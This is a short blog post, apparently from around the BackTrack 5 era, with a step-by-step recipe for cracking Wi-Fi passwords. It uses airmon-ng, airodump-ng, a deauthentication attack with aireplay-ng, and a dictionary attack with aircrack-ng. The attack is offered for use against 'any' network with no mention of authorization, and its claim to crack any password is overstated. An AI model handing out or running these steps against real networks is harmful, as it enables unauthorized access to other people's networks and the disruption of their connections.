hack any wi-fi passwords using backtrack 5
Hello everybody, this is today i'm
gonna show you how to hack
any wi-fi passwords using
backtrack 5
What We Need to hack Wi-fi
Password?
1)Backtrack 5 [ R1 or R2]
2)Compatable Wi-fi Card
So Let's Start... 1st open
Terminal and Then Follow My
Steps :
1)In Terminal type : airmon-ng
there we can see interfaces
2)Then type :airmon-ng start
wlan0 It must found proceses
3)then we type : airodump-ng
mon0 it will start scanning wi-fi
networks
4)copy bssid and tpye :
airodump-ng -c (channel) -w
(file name) --bssid (bssid) mon0
5)type : aireplay-ng -0 5 -a
(bssid) mon0
6)click on places home folder
drag in terminal wpa-01.cap in
terminal and type : aircrack-ng
(file Directory) or drag file in
terminal
7)type in terminal : aircrack-ng
(filename)*.cap -w (dictionary
location) And Hit Enter!
Success!
Enjoy!!!
1 Comments:
Well its simple but you have not explained the details
Post a Comment
Subscribe to Post Comments [Atom]
<< Home